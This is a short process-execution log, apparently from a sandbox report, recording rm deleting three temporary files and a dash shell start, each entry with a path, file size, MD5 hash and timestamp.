Path: /usr/bin/rm
Arguments: rm -f /tmp/tmp.bnEpNvlWmP /tmp/tmp.iVnar8LVj9 /tmp/tmp.IOGgSWDU3S
File size: 72056 bytes
MD5 hash: aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC): 05:43:11
Start date (UTC): 02/04/2025
Path: /usr/bin/dash
Arguments: -
File size: 129816 bytes
MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC): 05:43:11
Start date (UTC): 02/04/2025
Path: /usr/bin/rm
Arguments: rm -f /tmp/tmp.bnEpNvlWmP /tmp/tmp.iVnar8LVj9 /tmp/tmp.IOGgSWDU3S
File size: 72056 bytes
MD5 hash: aa2b5496fdbfd88e38791ab81f90b95b